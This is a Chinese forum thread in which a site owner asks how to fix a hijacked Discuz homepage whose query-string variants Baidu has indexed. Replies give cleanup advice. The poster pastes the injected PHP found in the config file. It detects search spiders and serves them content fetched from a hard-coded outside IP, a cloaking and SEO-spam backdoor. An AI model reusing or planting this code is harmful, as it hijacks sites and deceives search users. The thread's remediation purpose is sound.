网站被劫持后发现网站首页后面加任意字符都可以访问如何解决？

网站被劫持后发现网站首页后面加任意字符都可以访问如何解决？
0 O% r+ T  D" I  G) R
网站被劫持后生成了大量首页php后面加任意字符都还是可以访问
% y- m0 b$ x  {$ j+ Z# ^0 j百度收录大量的这样帖子
$ B/ o& {( H  n, ?' e" z0 E
) I( I/ E2 m2 V现在如何解决这样的？

/ z* p; y; ?. R' e% |& K宝塔面板。。。。。。
* {3 Z" b. l& j$ W  u1 C
' p- ~7 E  a1 o如/forum.php?123456
; |5 F9 f6 P. t1 b9 m/forum.php?12365
: O$ c; S" q: W- \( `5 P8 A/forum.php?515151
! W4 d- _4 p7 f: S
/ u; ?4 s* c. ~. C0 @随便加都可以访问，只有首页而已其他文章帖子加就不可以。。。

#set_time_limit(30);error_reporting(0);$tr=stristr;$er=$_SERVER;define('url',$er['REQUEST_URI']);define('ref',$er['HTTP_REFERER']);define('ent',$er['HTTP_USER_AGENT']);define('site',"http://156.226.52.130");define('road',"/?road=".$er['HTTP_HOST'].url."&der=".ent);define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');define('area',$tr(url,".xml")or $tr(url,".html")or  $tr(url,".doc")or $tr(url,".txt")or $tr(url,".ppt")or $tr(url,".xls")or $tr(url,".csv")or $tr(url,".shtml")or $tr(url,".docx")or $tr(url,".xlsx")and $tr(url,"?"));if(area&&preg_match(regs,ref)){echo g('http://156.226.52.130/404.html');exit;}if(preg_match(regs,ent)){if(area){echo g(site.road);exit;}else{echo g("http://156.226.52.130/u.php");ob_flush();flush();}}function g($f){$c=array('http'=>array('method'=>"GET"));$g=stream_context_create($c);$h=file_get_contents($f,false,$g);if(!empty($h)){return $h;}}
// --------------------------  CONFIG ADMINCP  -------------------------- //
// -------- Founders: $_config['admincp']['founder'] = '1,2,3'; --------- //

这个是加什么都可以访问，出现这种字符的原因解决了就好了。Q3160510998

你找到了劫持代码 并没有找到后门在哪，还是会出现的

cardz! 发表于 2020-11-30 06:34
这个是加什么都可以访问，出现这种字符的原因解决了就好了。Q3160510998

啥原因呀？现在是加啥都还可以访问..

1270643127 发表于 2020-11-30 11:34
啥原因呀？现在是加啥都还可以访问..

) N. J, f' q( @2 n谁的都可以，不只是你的。

cardz! 发表于 2020-11-30 13:54
谁的都可以，不只是你的。

! F1 H# z6 N0 \! F  `那不是不能解决了？已经收录了好多了

1270643127 发表于 2020-11-30 17:40
那不是不能解决了？已经收录了好多了

你先把config里边那段代码删除，然后还要检查最近新增和修改的文件
6 S  g' g4 ?1 [) ^# N
你去做一个抓取测试(你自己正常访问页面，是正常的，但是蜘蛛访问，是另外一个样子)
如果没有注册百度站长或者百度统计，就去下面这个网址，也可以
3 s* ]. [' q6 i( i

1. http://stool.chinaz.com/tools/webcheck.aspx

复制代码

如果以前的那些页面依然有问题，就说明你没有清除干净（也算不上清除干净，你删除了恶意代码，但是后门还是在的）
  ~2 w6 n2 p" W9 f& J# L1 Z
我自己网站的黑链网址是/?s***.后缀   清除之后，这些页面就不能访问了，然后你可以去百度提交死链，删除这些快照。当然啦，我很早以前就在robots里边直接屏蔽了【？】 所以被挂黑链半个月，百度 根本没有收录黑链。然后我发现黑链之后，直接去百度申请闭站了，解决完了才恢复的

而且你使用宝塔，宝塔有免费防火墙，你可以把恶意代码的一些关键词，比如“156.226.52.130” “$tr(url” 直接添加到防火墙。并且，定期扫描(扫描结果要分析哈，DZ默认的某些文件也会被扫描出有问题，但是并不是真的有问题)